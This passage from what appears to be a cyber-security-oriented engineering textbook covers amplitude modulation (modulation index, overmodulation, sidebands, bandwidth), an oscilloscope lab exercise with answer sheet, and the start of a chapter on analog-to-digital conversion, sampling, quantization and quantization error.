showing the graphical relation between Vm and Vc: The envelope of the modulating signal (which is drawn onto the AM signal below in a dashed red line) varies above and below the unmodulated carrier amplitude, Vc. It is the envelope that carries the information signal; the receiver must separate the envelope from the received AM signal to recover the information that was transmitted. In this case, the envelope is in the shape of a sine wave, which is the same as the information signal. The values of Vm and Vc are related by the modulation index (m). Modulation Index The relationship between the information signal amplitude, Vm , and the unmodulated carrier amplitude, Vc , is expressed as a ratio called the modulation index (m), defined as: m Vm VC Sometimes m is expressed as a percentage: percent modulation = m x 100%. The following figure shows the AM signal at three different values of percent modulation: 20%, 50% and 90%. Overall, the greater the value of m, the closer the envelope gets to the horizontal (time) axis. 461 We can also mathematically determine the modulation index m from the maximum and minimum values of the envelope of vAM(t) as follows, where Vmax is the maximum value of the envelope and Vmin is the minimum value: Vmax Vmin 2 Vmax Vmin Vc 2 V V Vmin m m max Vc Vmax Vmin Vm In order for the AM signal to convey the original signal accurately and prevent distortion, the information signal amplitude (Vm) must be less than the unmodulated carrier signal amplitude (Vc). Here again, the unmodulated carrier refers to the AM signal if the information signal amplitude is equal to 0 (Vm = 0), in which case, vAM (t) = Vc sin(2p fct) . The maximum usable modulation index is m = 1.0, corresponding to 100% modulation, when Vm is equal to Vc. When Vm is greater than Vc (that is, m > 1), overmodulation occurs. Overmodulation, depicted below, results in distortion of the AM signal’s envelope, and since the envelope holds the information, the recovered information signal is also distorted. 462 Practice Problem 20.3 If a carrier signal vc(t) = 9 sin(25000t) Volts is modulated by a sine wave vm(t) =7.5 sin(2440t) V, what is the percentage modulation of the resulting AM signal? Now that we have a basic understanding of how Amplitude Modulation works in the time domain, let’s look at AM in the frequency domain. 4. AM in Frequency Domain Recall the equation for the amplitude modulated waveform if the information signal is a single sine wave is given by: vAM (t) = (Vc +Vm sin(2p fmt)) sin(2p fct) . We already know the frequency domain representations of the modulating signal (vm(t)) and the carrier signal (vc(t)), but how does the amplitude modulated signal look in the frequency domain? To answer this question, recall the trig identity for the product of two sine waves: sin Asin B = 12 cos( A- B) - 12 cos( A+ B) Applying this trig identity for product of two sine waves to the AM signal results in: vAM (t) = (Vc + Vm sin ( 2p fm t )) sin ( 2p fct ) = Vc sin ( 2p fct ) + Vm sin ( 2p fct ) sin ( 2p fmt ) = Vc sin ( 2p fct ) + Vm V cos ( 2p ( fc - fm ) t ) - m cos ( 2p ( fc + fm ) t ) 2 2 This means that when a single sine wave information signal is used to modulate the carrier in AM, the resulting AM signal contains three sinusoids: one at the carrier frequency, one fm Hz below carrier frequency, and one fm Hz above the carrier frequency. For the tuning fork example, we have: fc = 5 kHz, fc − fm = 4.560 kHz and fc + fm = 5.440 kHz. The trig identity puts the amplitudes at frequencies fc − fm and fc + fm at one half that of Vm. This means the resulting frequency domain plot for this tuning fork example looks like the following (note that the plot shows the magnitude of the frequency content, so the negative cosine amplitude shows up as positive-going spikes on the plot): 463 The process of modulating a carrier creates an upper and a lower sideband that is apparent in the frequency plot. The lower sideband (or LSB) is that portion of the transmitted signal that has frequency content less than the carrier frequency, and the upper sideband (or USB) has frequency content greater than the carrier frequency. For the tuning fork example, the USB is the 5440 Hz cosine, and the LSB is the 4560 Hz cosine. On a frequency plot of an AM signal, the lower sideband is a mirror image of the upper sideband centered about the carrier frequency. What is the AM signal’s bandwidth? Since bandwith is the highest transmitted frequency minus the lowest frequency transmitted, it is (fc + fm) − (fc − fm) = 2 fm = 880 Hz. This is twice the bandwith of the information signal we started with…if we didn’t modulate the information signal, the transmission bandwidth would have only been fm (440 Hz in this case)43. This means that by transmitting with AM, we have doubled the required bandwith to transmit the signal. Why is this a concern? Bandwidth is the #2 limiting factor in communications systems, and can be expensive to use… so we’re going to want to send as much information as possible while occupying the minimum amount of bandwith possible. Let’s look at a slightly more complex example – suppose the information signal was comprised of two sine waves: vm (t) = V1 sin(2p f1t) +V2 sin(2p f2t) What does the AM signal look like? Again, we apply the same trig identity to each sine in the information signal, resulting in: vAM (t) = (Vc + vm (t)) sin ( 2p fct ) = (Vc + V1 sin ( 2p f1t ) + V2 sin ( 2p f2t )) sin ( 2p fct ) = Vc sin ( 2p fct ) + V1 sin ( 2p fct ) sin ( 2p f1t ) + V2 sin ( 2p fct ) sin ( 2p f2t ) = Vc sin ( 2p fct ) + V1 V cos ( 2p ( fc - f1 ) t ) - 1 cos ( 2p ( fc + f1 ) t ) 2 2 V2 V + cos ( 2p ( fc - f2 ) t ) - 2 cos ( 2p ( fc + f2 ) t ) 2 2 The net result is that for each sine in the message, we will wind up with two cosines in the AM signal: one will have a frequency greater than the carrier frequency, one will have a frequency less than the carrier frequency. The bandwidth is still equal to the highest frequency in the AM signal minus the lowest frequency. This is equal to two times the max frequency in the information signal. That is, if fmax is the maximum of the two frequencies in the information signal (either f1 or f2), then the AM bandwidth is BW = 2 fmax. Practice Problem 20.4 Suppose we want to transmit the sound of a two chime doorbell (f1=349 Hz, f2= 440 Hz) using VLF (very low frequency) communications (let fc = 20 kHz). Each of the chimes has an amplitude of 10V, and the carrier’s amplitude is 20V. Sketch the frequency domain representation of the transmitted signal and determine the bandwidth. Which of the two chime frequencies determines the bandwidth? 2 The bandwidth of a baseband signal is considered to be its maximum frequency content. In this case, if the message is a single sinusoid at a frequency of fm Hz, we say its bandwidth is fm Hz. 464 Practice Problem 20.5 If a carrier signal vm (t) = 20sin ( 2p 5000t ) Volts is amplitude modulated by information signal vm (t) = 4sin ( 2p 200t ) - 6cos ( 2p 400t + 411p ), sketch the frequency plot for the resulting AM signal and calculate the transmission bandwidth. An example of an even more complicated signal is the signal created by recording an oboe (the musical instrument) playing a single note. When someone blows into the mouthpiece of an oboe to play a note, their fingers are placed over certain holes to create the note. Because of the structure of the oboe (its length, diameter and placement of the holes for example), the sound the instrument makes is actually a combination of a number of tones (sinusoids) with different amplitudes. Different instruments can all play the same note, but each instrument will sound differently because the structure of the instrument produces different sinusoids with different amplitudes. Amplitude modulation of an oboe playing the note Concert A is demonstrated on the next figure. In this figure, the maximum frequency present in the note is approximately 4 kHz, so the bandwidth of the AM signal is BW = 2 fmax = 2 (4 kHz)= 8 kHz. Other common information signals, such as voice or music, are composed of many different frequencies. AM modulation still works the same way, but in order to compute transmission bandwidth, we again compute it as BW = 2 fmax. Again, here, fmax is the maximum frequency content present in the information signal. 5. Demodulation Modulation is used to upshift the frequency content of a baseband signal, to facilitate transmission (e.g., to allow a smaller antenna). Demodulation is performed in the receiver to downshift that frequency content back to its baseband frequency. For example, if the 440 Hz tuning fork signal were transmitted on Annapolis AM radio station WYRE 810AM (fc = 810 kHz), the transmitted signal is at a frequency of approximately 810 kHz, which is well outside our hearing (we can hear signals with frequency content up to approximately 20 kHz). In order to hear the tuning fork signal, our car’s radio receiver must shift the frequency content back down to its original range (440 Hz). This is demodulation; it basically “undoes” what modulation did to the information signal. How demodulation works is beyond the scope of this course, but you should be aware of its importance in a communication system. What’s the point? AM is by no means the only form of modulation (though it’s probably the easiest to work through and visualize). The intent of this course is not to make you all communications engineers, but you do need to have enough background in modulation to understand the implications (especially with regard to bandwidth) moving forward. You’ll see this again in a few lessons, with digital applications. 465 466 Problems 1. (a) Calculate the wavelength of signals with frequencies of 1.5 kHz, 18 MHz, and 22 GHz. (b) Since an antenna that is needed to transmit these frequencies must be at least a tenth of the wavelength, which signal frequency would NOT be practical for direct (i.e., baseband) transmission? (c) Name and define a technique that could be used to transmit the frequency in part (b). 2. An AM signal is comprised of the following two signals: vm(t) = 80 cos (2π5000t) volts vc(t) = 100 cos (2π800,000t) volts where vm(t) is the message and vc(t) is the “unmodulated carrier” (i.e., the output of the modulator when information signal is present). no (a) Find the carrier frequency, the upper-sideband and lower-sideband frequencies, and the percent modulation (m). (b) Suppose vm(t) changes to 120 cos(2π5000t). Find the new percent modulation (m). Give the technical term for this condition and explain the effects of this condition occurring. 3. A radio station, 1280AM, is conducting a monthly test of the Emergency Alert System. The test begins with an annoying sound comprised of two pure tones at 853 Hz and 960 Hz. The signal being broadcast has exactly five frequency components, i.e., the signal could be written as follows: vAM(t) = V1 sin(2π f1 t) + V2 cos(2π f2 t) - V3 cos(2π f3 t) + V4 cos(2π f4 t) - V5 cos(2π f5 t) volts (a) Find the five frequencies that comprise the AM signal being broadcast. Recall that the carrier frequency and the two sideband frequencies for each of the emergency alert tones will be involved. (b) Find the bandwidth for this particular broadcast. (c) Determine which of these two emergency alert tones (853 Hz or 960 Hz) determines the bandwidth. (d) What is the bandwidth assigned to a commercial AM radio station in the United States? 4. Musical notes can be viewed as pure tones (if we ignore the “warmth” added by any particular instrument). Pure tones are signals that contain only one frequency. Chords are combinations of notes, such as the C-Major chord on the piano, comprised of notes C, E, and G. If the radio station 1280AM broadcasts the C-Major chord, it would broadcast the following seven frequencies, listed in ascending order and annotated by note and sideband: f LSB-G f LSB-E f LSB-C f carrier f USB-C f USB-E f USB-G = 1,279,608 Hz = 1,279,670 Hz = 1,279,738 Hz = 1,280,000 Hz = 1,280,262 Hz = 1,280,330 Hz = 1,280,392 Hz Notice that in the lower sideband, the notes are in reverse order. G, the highest pitch in the chord, is always the farthest away from the carrier frequency. The carrier frequency is exactly in the middle. Assume that the carrier amplitude is 100V, and the voltages for the three musical notes are all 20V. (a) Sketch this broadcast in the frequency domain (label frequencies and amplitudes). (b) After demodulation, what frequencies would be heard coming out of a your AM radio’s speaker? (c) Find the bandwidth of the broadcast and determine which note (C, E, or G) sets the bandwidth. 467 5. For the following plots of AM signals, determine Vmax, Vmin, Vc, Vm and m. Show your work! (a) 15 13 11 9 7 5 AM signal 3 1 -1 -3 -5 -7 -9 -11 -13 -15 0 0.5 1 1.5 2 2.5 3 3.5 4 4.5 5 3 3.5 4 4.5 5 time (msec) (b) 20 18 16 14 12 10 8 6 AM signal 4 2 0 -2 -4 -6 -8 -10 -12 -14 -16 -18 -20 0 0.5 1 1.5 2 2.5 time (msec) 468 (c) 15 13 11 9 7 5 AM signal 3 1 -1 -3 -5 -7 -9 -11 -13 -15 0 0.5 1 1.5 2 2.5 3 3.5 4 4.5 5 3 3.5 4 4.5 5 time (msec) (d) 20 18 16 14 12 10 8 6 AM signal 4 2 0 -2 -4 -6 -8 -10 -12 -14 -16 -18 -20 0 0.5 1 1.5 2 2.5 time (msec) 6. Determine fc and fm for any of the AM signals in problem 5 (parts (a)-(d)). (Hint: fc and fm are the same for each case). Using these values of fc and fm, along with your answers to problem 5, sketch the frequency content for each of these AM signals (parts (a)-(d)). 7. For any of the plots shown in problem 5, determine the bandwidth of the transmission. Note that each of these AM signals has a single sinusoid as the information signal. (Hint: the bandwidth is the same for each case). 469 470 Security Exercise 20 Introduction to Amplitude Modulated Signals PART I: SET UP Check-off each step as you complete it. Step One: Function generator setup. □ □ □ □ □ □ □ Turn on power to the lab bench (the switch on the right that says "120V OUTLETS.") Turn on the function generator. Select the sinusoidal function by pressing the button with the Sine wave on it. The function generator display should indicate a small sine wave. Turn any other lit buttons off. Select the Utility function and Output Setup soft key. Load should be High Z. Push Done. Press the output button. Step Two: Oscilloscope setup. □ □ □ Turn on the oscilloscope. Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor installed. Connect banana plug cables (which can be found under the bench on the plastic Quad board) from the function generator’s output to the CH 1 input on the oscilloscope (red to red and black to black). PART II: AMPLITUDE MODULATED SIGNAL IN THE TIME DOMAIN An Amplitude Modulated (AM) signal looks somewhat like the figure that follows. This particular depiction includes the AM signal’s envelope, and the definitions of Vm (message amplitude), Vc (carrier amplitude), Vmax (max envelope voltage) and Vmin (min envelope voltage). The information signal (message) modulates the amplitude of the carrier. □ On the Function Generator select the Store/Recall button and then push Recall State and then push State 3 and then 471 Recall State again. Make sure the output button is lit. □ □ □ □ □ □ Push AUTOSET on the Oscilloscope and you will see an AM signal. Press CH 1 MENU on the oscilloscope and make the following settings. Coupling: AC BW Limit: OFF Volts/Div: COARSE Probe: 1X Invert: Off If a trace appears for CH2, then press the CH2 Menu button twice to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab. With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the position knob under the vertical section in the CH 1 column, so that the “1→” on the left side of the LCD is adjacent to the major horizontal axis (centered vertically on the display). Adjust the vertical scale (Volts/Div) to enlarge the displayed signal so that it occupies more than half of the oscilloscope display. Adjust the horizontal range (Sec/Div) so that you can see the AM waveform similar to the one shown on Figure 1 above. You may have to adjust the knob for trigger level (it is to the far right below the AUTOSET button) to clean up the signal. Turn the knob so that you see the trigger level (arrow to far right of screen) rise from the center line. Hint: if you have trouble removing the “jitter” from the graph, use the “Run/Stop” button in the upper right hand corner of the oscilloscope to pause the capture. Once the display is properly adjusted, use the boxes on the oscilloscope to measure the following parameters. Record your results in Question 1 on your answer sheet. 1. Measure Vmin and Vmax (see Figure 1). 2. Measure the period of the carrier, T carrier (higher frequency signal). You will have to adjust the horizontal (sec/div) scale to accurately measure a the period of a cycle of the high frequency carrier signal. 3. Measure Tmessage, the period of the message (lower frequency signal). You will need to adjust back the horizontal (sec/div). Note: T message measures the cycle of the wave that rides along the top of the carrier as the carrier is modulated. Calculate the modulation index m, the carrier frequency (fc), the message signal's frequency (fm), the amplitude of the carrier (Vc) and the amplitude of the message signal (Vm). Use the equations shown in Table 1 below along with your measured values. Record your results in Question 1 on your answer sheet. Vm = Vmax - Vmin 2 Vc = Vmax + Vmin 2 m= Vm Vmax - Vmin = Vc Vmax + Vmin 1 1 fm = Tc Tm Question 2: Determine the equation of the AM waveform displayed on the oscilloscope. Write your answer on your answer sheet using the form below, but with numerical values replacing A, B, C and D: fc = 472 vam (t) = [ A + Bsin(2p Ct)]sin(2p Dt) PART III: AMPLITUDE MODULATED SIGNAL IN THE FREQUENCY DOMAIN Let’s look at the frequency spectrum of this signal. In class we manipulated the above equation to show us what frequencies will show up in the frequency domain: vAM (t) = Vc sin(2p fct) + Vm V cos ( 2p ( fc - fm ) t ) - m cos ( 2p ( fc + fm ) t ) 2 2 There are 3 frequencies in the AM signal: the carrier and its 2 sideband frequencies. So let us try to see this signal in terms of its frequency content. Again, the oscilloscope performs a fast Fourier transform (FFT) and displays the magnitudes of the frequencies present in the signal vs. frequency, so the horizontal scale shows frequency instead of time. The y-axis will show values in decibels, which can be ignored for this lab. □ □ □ Press AUTOSET and you will see the options to display the signal in time or in frequency (FFT). (NOTE: If the FFT option does not appear when you press AUTOSET, then press the MATH MENU button.) Push the button next to the FFT (or stay in FFT operation) and you will see spikes at specific frequencies. Set the horizontal scale to read 12.5 kHz per division using the Sec/Div knob. Question 3. Determine the value of the center and sideband frequencies. Use the Frequency cursor (recall that when using the FFT to show frequency content, the source must be MATH, not CH 1 or CH 2 to use the frequency plot cursors) Question 4. Sketch your frequency plot. Label the frequency axis with your values and have your instructor check it. Question 5. What is the bandwidth of the amplitude modulated waveform? Question 6. Rewrite your AM signal using the form below: vAM(t) = Asin ( 2p Bt ) + C cos ( 2p Dt ) - E cos ( 2p Ft ) filling in numerical values for A, B, C, D, E and F (different than the A-D above). Question 7. Is this AM signal within the range of commercial AM radio frequencies? Question 8. If the information signal from above contained many frequencies (including frequencies higher than the fm you measured), how would this affect the bandwidth of the amplitude modulated waveform? PART IV: ANOTHER AMPLITUDE MODULATED SIGNAL You have a message signal you would like to transmit, but do not have access to an AM transmitter. An evil user offers to transmit your signal (for a small fee). You pay the fee. Your customers start complaining that your signal sounds terrible. You examine the amplitude modulated signal that the evil user has generated for you: □ □ □ On the Function Generator select the Store/Recall button and then push Recall State and then push State 4 and then Recall State again. Make sure the output button is lit. Push AUTOSET on the Oscilloscope and you will see an AM signal. Eliminate the CH 2 signal (if necessary), vertically center the waveform and adjust the horizontal range and trigger level to stabilize the AM signal. Question 9. Explain the problem with the evil user AM signal (hint: look at the shape of the envelope). 473 474 Security Exercise 20 Answer Sheet Name: __________________________________________________________________________________________ Question 1: Vmax Vmin Vc Vm Tc (s) Tm (s) fc (kHz) fm (kHz) m __________________________________________________________________________________________ Question 2: __________________________________________________________________________________________ Question 3: fc = ___________ flsb = _____________ fusb = _____________ __________________________________________________________________________________________ Question 4: __________________________________ Instructor / Lab Tech __________________________________________________________________________________________ Question 5: __________________________________________________________________________________________ Question 6: __________________________________________________________________________________________ Question 7: __________________________________________________________________________________________ Question 8: _________________________________________________________________________________________ Question 9. __________________________________________________________________________________________ 475 476 Chapter 21: Analog to Digital Conversion Objectives: (f) (g) (h) (i) Provide examples of analog and digital communication systems. Describe the advantages of digital over analog communication. Discuss the basic steps of the analog-to-digital conversion process: sampling, and quantizing/encoding. Given an analog waveform, sampling rate, and resolution, determine the resulting quantized signal and the binary encoded A/D output. (j) Calculate the Nyquist sampling rate for an analog signal. (k) Given the number of bits in an A/D process, and sample frequency, determine generated bit rate. (l) Describe how the number of bits used in the A/D process effects the reconstructed analog signal. Connection to Cyber Security In Chapter 20, you learned about modulation, and that it is impractical to transmit signals at baseband frequencies through free space. Modulation upshifts the frequency of transmission, to allow for smaller antennas. For an AM communication system, the signals at various places in the system is shown below. We could have also used FM or PM, in which case the signal that exists in the communication channel (free space) might look like the following, depending on the information signal (left: frequency modulation, right: phase modulation). In a digital communication system, the information is composed of 1s and 0s, and the information signal is composed of voltage pulses that represent the 1s and 0s. Hackers can attack our system in a number of ways, such as “reading our mail” or injecting their own information into our channel. In the digital age, cyber attacks usually fall onto digital communication systems. But where do the 1s and 0s come from? Chapter 21 deals with how 1s and 0s are created from an analog signal. 1. Analog Systems. When you look at the waveform below, you should notice that it is a signal that varies continuously in time and amplitude. If we observed nature, we would see that nature produces signals like this (i.e., changes in pressure, variations in light, sounds, etc.). Analog systems use analog electrical signals to represent these natural patterns, such as the voltage signal created from the sound waves of a person speaking into a microphone, shown in the next figure. 477 What do you think might be an example of an analog system in action? How about an 8-track tape player playing the songs on Michael Jackson’s 8-track album, Thriller. This is a great example of an analog system, but my guess is you have no idea what an 8-track is. So, let’s list some other analog systems that that may ring a bell: AM/FM radios, rotary telephones, cassette tape players, VCRs, broadcast TVs, the microphone you are singing into at Bancroft’s karaoke night… So maybe you’re thinking, “I still have no idea what that stuff is!” There’s probably a reason for that. We don’t really use many systems that are completely analog anymore; digital communications are more widely used. 2. Digital Systems. Let’s think for a second about comparisons between what was used in the past and what you use now: Type of Information Music Videos Broadcast Television Past Device Cassette Tape VHS (VCR) Standard Definition TV Present Device CD DVD/Blueray Disc High Definition TV (HDTV) We want the same types of information but are using a different method to get them: digital systems. Digital systems use electrical signals that represent discrete (often binary) values. The electrical signals are referred to as digital signals. Specifically, binary baseband digital signals use two discrete voltage levels to represent binary 1 or 0 (bits), as shown in the example plots below. Combining multiple bits into words permits us to represent more than just two things. Digital circuits operate on digital signals, performing logic and arithmetic functions. Interesting fact and important to the class: digital signals are not representative of signals that occur in nature. Natural signals are analog, and must be converted into digital format to be used in a digital system. Great! So we’re using a new method to get the same information. Is this a big deal? It is, because using digital systems offers a number of advantages over using analog systems. 3. Digital Advantages. 1. Relative noise immunity. (What is the number one limiting factor in communications? Noise.) Relative noise immunity is the most important advantage of digital communications Between the transmitter and receiver, whether the system is analog or digital, noise always corrupts the transmitted signal. In general, an analog receiver has no idea what the received signal is supposed to be after it has been corrupted by noise, but a digital receiver only has to decide between a finite set of choices: for example, a binary digital system’s receiver must only decide at any time whether or not it is receiving a binary 0 or a binary 1. This means that receiver circuitry can be designed to distinguish between a 0 and 1 even in the presence of a significant amount of noise. It is possible that the noise could be severe enough that the receiver gets confused, and incorrectly decides it is receiving a 0 when it should be deciding a 1 (or vice versa)…these are referred to as bit errors. But in general, digital systems are much better in noisy environments. 478 In long distance digital communications, digital signals can be stripped of any noise in a process called signal regeneration. Consider a long distance transmission that incorporates a set of relay stations in order for the signals to move from transmitter to receiver, as shown in the figure to the right. Relay stations are needed because the farther a signal travels, the weaker it gets; to make it to its destination, it must be amplified and retransmitted at the relay stations. If this was an analog system, the analog signal is received, amplified and retransmitted at each station. However, noise is now a part of the signal, and so is also amplified at each station. In a digital communication system, a digital signal is received (receiver decides 0s or 1s), regenerated (digital signal recreated based on the 0s and 1s), and then retransmitted at each station. With signal regeneration, the noise can be eliminated at each station. This can only be done in digital communication systems. 2. Error detection/correction. Digital signal processing (DSP) techniques allow the detection and correction of bit errors. Even if a digital signal contains bit errors, many of these errors can be fixed at the receiver through the use of error correcting codes. Error correcting codes allow, for example, CDs with minor scratches to be played without errors. Analog systems cannot detect or correct errors. 3. Easier multiplexing. Multiplexing is the process of allowing multiple signals to share the same transmission channel. For example, digital telephony allows carrying 24 phone conversations on a single wire (called a T1 line) at the same time. Digital signal processing techniques enable this. 4. Easier to process and store. Since computers store and use digital data, digital signals can be easily processed by computers. Similarly, the digital format lends itself to easier storage of communication signals (e.g., smaller storage footprint). DSP allows operations such as filtering, equalization and mixing to be done in software without the use of analog circuits. DSP also permits data compression (transforming signals so that fewer bits are needed to represent them). An example of DSP would be Garage Band, for you musicians, or photo editing software like Adobe Photoshop, for those with a knack for photography. To emphasize this again, these advantages are huge. This is such a big deal that even though communication systems used to be exclusively analog, it is worth the billions and even trillions of dollars that the government and private sector are spending to migrate communication systems to digital. 4. Conversion from Analog to Digital (A/D) If nature produces analog signals, how do we create digital signals from them? Before we can use digital transmission, we must convert the signal of interest into a digital format. The natural signal (e.g., speech) that we want to transmit will be acquired using an analog device. The analog signal will be translated into a digital signal using a method called analog-todigital (A/D) conversion. The device used to perform this translation is known as an analog-to-digital converter or ADC. Through A/D conversion, analog signals are changed into a sequence of binary numbers (encoded bits), from which the digital signal is created by the transmitter. This process is depicted below. There are two major steps involved in converting an analog signal to a digital signal represented by binary numbers: sampling, and quantizing/encoding. Steps for A/D conversion: 1. Sampling. This is a process of inspecting the value (voltage) of an analog signal at regular time intervals. The time between samples is referred to as the sample period (T, in seconds), and the number of samples taken per second is referred to as the sample frequency (fs, in samples/second or Hz). Basically, sampling is taking snap-shot values of the analog signal so that you have an accurate representation of how the analog signal is changing over time. 479 The receiver must convert the bits it receives into sample values, and then recreate what it thinks the analog signal looks like from the samples alone. As you might deduce from the figure below, when the samples are closer together (smaller sample period, which means higher sample frequency), the analog signal is more accurately represented. Note that with the lower sample rates, some of the fluctuations in the analog signal have no samples on them, so the samples are not a good representation of the analog signal. How high does our sampling frequency fs need to be in order to accurately represent the signal? That is, what is the minimum sample frequency for the A/D to work properly? We could consider taking just a few samples (i.e., using a low sampling rate), which means less information to transmit to the receiver. But if we choose that option, when we reconstruct the signal, it will likely be a terrible representation of the original. The low sampling rate will only work well for very slowly changing (low frequency) signals. Alternatively, we could choose the highest possible sampling rate known to man, to ensure that we can accurately capture even very fast signal fluctuations. But the higher the sampling rate, the higher the cost of the equipment and more information must be transmitted. In addition, if we decide to record the communications our saved files will be unnecessarily enormous. But what is “low” and what is “high”? In other words, how exactly do I go about choosing my sampling rate? In order to accurately reconstruct an analog signal from its samples, one must sample faster than the Nyquist sampling rate (also called the Nyquist rate), fN, given by the formula 𝑓𝑁 = 2𝑓𝑚𝑎𝑥 , where fmax is the highest frequency component of the analog signal. That is, the sampling frequency must be more than twice the value of the highest frequency component of the signal: f s f N , where fN = 2fmax If the sample rate is not greater than the Nyquist rate, a problem called aliasing results. We’ll talk more about aliasing in the lab, but it can cause severe distortion of your signal. The Nyquist sample rate is a floor on the examples of common sample rates are: Signal Voice Music Music sampling rate, and practical systems sample greater than the Nyquist rate. Some Signal frequency range 300 Hz-3 kHz 0-20 kHz 0-20 kHz 480 Standard Sample Rate 8 kHz 44.1 kHz (CD-quality) 192 kHz (DVD-quality) Practice Problem 21.1 Consider the signal from the oboe depicted below in time and frequency domain representations. What is the maximum frequency present in the oboe signal? 1. Based upon this, what sampling rate must be exceeded in order to accurately reconstruct the signal from its samples? 1 0.25 0.2 Voltage (V) Voltage (V) 0.5 0 0.15 0.1 -0.5 0.05 -1 1 1.0005 1.001 1.0015 1.002 1.0025 1.003 1.0035 1.004 1.0045 1.005 Time (sec) 0 0 1000 2000 3000 4000 5000 Frequency (Hz) 2. Quantizing/Encoding. Quantizating/encoding is the process of mapping the sampled analog voltage values to discrete voltage levels, which are then represented by binary numbers (bits). This is needed because the analog sample values are real numbers that occur on a continuum. That is, for example, if a sine wave of amplitude 1V is being sampled, the sample values could be any value between -1V and +1V… an infinite number of possibilities. In any digital system, there is only a finite amount of memory, so only a finite number of values can be used to represent the samples of the analog signal. Converting a sample value from the set of infinite possibilities to one of a finite set of values is called quantization or quantizing. These values are referred to as quantization levels. Inputs to A/D converters are limited to a specific voltage range. For the sine wave example above, we assumed that all values of the analog input fall within a range of -1.0 to +1.0 volts (note: this is the typical voltage range of voice or music signals on a computer, such as in .wav or .mp3 files). A/D systems are characterized by the number of bits they have available to perform quantization. The number of bits determines the number of quantization levels. An N-bit A/D converter has 2N quantization levels and outputs binary words of length N (that is, it outputs N-bit values for every sample). For example, a 3-bit A/D system has 23 = 8 quantization levels, so all samples of a 1V analog signal that is input to this A/D will be quantized into one of only 8 possible quantization levels and each sample will be represented by a 3-bit digital word. In general, the A/D converter will partition a range of voltage from some vmin to some vmax into 2N voltage intervals, each of size q volts, where q vmax vmin . 2N Some common examples of A/D quantizing are digital telephony, which uses 8-bit A/D (28 = 256 quantization levels), CD audio, which uses 16-bit A/D (216 = 65,536 quantization levels), and DVD audio, which uses 24-bit A/D (224 = 16,777,216 quantization levels). 481 6000 The following figures represent conceptionally how a 3-bit A/D converter converts an analog signal into bits. In these figures, the analog signal is shown as well as the samples, with samples taken every 0.5 msec (corresponding to a sample rate of fs = 1/0.0005 sec = 2000 samples/sec). The actual analog sample voltages are shown in parantheses next to the samples. Here, the voltage range of the signal is divided into 23 = 8 smaller voltage intervals (also called steps). These are separated by the dashed, bold horizontal lines, and each interval is 0.25V wide: q= vmax - vmin 1- (-1) = = 0.25V 2N 8 . The value of q is more formally called the quantizer’s resolution. Each of the voltage intervals is assigned an N-bit binary number representing the integers from 0 to 2 1 . For this example, you can see that since we are using a 3-bit A/D, the intervals will be assigned binary numbers representing the integers from 0 to 7 (that is, 000, 001, 010, …, 111), starting from the bottom of the voltage range. In this case, the digital word 000 is assigned to the voltages from -0.75 V to -1.0 V, 001 is assigned to the voltages from -0.5 V to -0.74999 V…, and so on. The figure that follows shows for each quantization interval the associated 3-bit digital word (on the left side of the plot). Any analog sample that falls in a given voltage interval will result in those 3 bits being transmitted. N When a sample point falls within a given interval, it is assigned the corresponding binary word (this is the Encoding part of Quantization/Encoding). For the first sample point at time 0, the voltage is 0.613 V, which means that sample is assigned a binary value of 110. The A/D then creates a voltage signal that represents these bits, and that process continues as long as an analog signal is input to it. 482 The binary representation of the above signal is: 110 101 100 011 011 100 110 110 100 010 000 000 001. In this example, every sample produces 3 bits (that is, there are 3 bits/sample). The sample rate was 2000 samples/sec. Multiplying these two values together results in the bit rate (Rb) produced from this A/D conversion: Rb = 3 bits 2000 samples ´ = 6000 bits/sec (bps) sample sec To the right of the plot above is the quantization level associated with each voltage interval. Any analog sample voltage that falls in a given interval is effectively estimated to the center of its quantization level when it is desired to reconstruct the analog signal from the received bits (a receiver may perform this). This process is referred to as Digital-to-Analog conversion (D/A) and will be discussed briefly in the next section. For this example, the quantization level for the lowest voltage interval is the value halfway between -.75 V and -1 V (which is -0.875 V). This means that any analog sample that fell into this range will be represented as -0.875 V. Alright, we’ve walked through an A/D example together; now it’s your turn. 483 Practice Problem 21.2 Consider the following analog waveform. This waveform is sampled at a 500 Hz rate and quantized with a 2-bit quantizer (i.e., A/D converter) The input range is -1.0 to +1.0 V. a. Circle the sample points (first sample is at time t = 0 sec). b. Indicate the quantization intervals and corresponding digital words. c. Indicate the digital word assigned to each sample point. d. What is the stream of binary bits generated after the A/D conversion is complete?. e. What is the resulting bit rate from this A/D? Amplitude (volts) time (msec) 484 To give you an idea, here’s the effect of quantizing in a digital picture. Look at a color display of this picture (such as the pdf file of the notes posted on the course website). See the difference? 4 bit = 16 colors 8 bit = 256 colors Here is an example of a digital voltage waveform that might have been generated from an A/D process: 011100110111111110011001 This waveform could be transmitted from the receiver to the transmitter over a wire, but is not suitable to transmit wirelessly through the atmosphere. We’ll get into more detail about how this is done in our next chapter on digital modulation. 5. Conversion from Digital to Analog (D/A) But how do we recover the analog information after it has been converted to digital? As mentioned earlier, the receiver converts these N-bit digital words back into an analog signal. This process is called digital-to-analog (D/A) conversion. It is very similar to being the reverse of the analog-to-digital conversion process. The analog signal is reconstructed by converting the N-bit digital words into the appropriate quantization levels, and this voltage is “held” for one sample period, creating a stairstep-type signal shown below. Good job. We’ve regenerated our original signal. How does it compare with the original? Let’s see. The reconstructed analog signal for our 3-bit example is shown in a thick black line in the next figure, along with the 3-bit digital word that represents each sample. The original analog signal is also shown in the continuous line, along with all of the sample points that were on the earlier figures. 485 Is it close? It follows the same general shape. Even if we perform filtering to smooth out the reconstructed signal to remove its staircase appearance (which is typical) it will still not quite be the same as the original red signal. Why? Is that the best we can do? 6. Quantization Error. There is always error introduced with the A/D process. The error is the difference between the original analog signal and the reconstructed (stairstep) signal after A/D and D/A. The following figure is a portion of a music signal that has been quantized with 3 bits. The upper plot shows the original analog signal along with the recovered analog signal from the A/D process. The bottom plot is the quantization error, which is created by subtracting the recovered signal from the original analog signal at each instance of time. So is it bad? It can be. The quantization error manifests as noise in the reconstructed analog signal. For digital audio signals (music or voice), it can sound like static. The greater the quantization noise, the louder the static, making it harder to hear the voice or music. Reiterating what was presented in Chapter 19: NOISE IS THE NUMBER ONE LIMITING FACTOR IN COMMUNICATION SYSTEMS. In this case, if quantization is part of the communication system (e.g., using a digital communication system to transmit analog information), then the A/D process adds even more noise to the signal as it moves from transmitter to receiver. So how do we reduce the quantization error and its associated noise? Quantization error can be reduced by increasing the number of bits N for each sample. This will make the quantization intervals smaller, reducing the difference between the analog sample values and 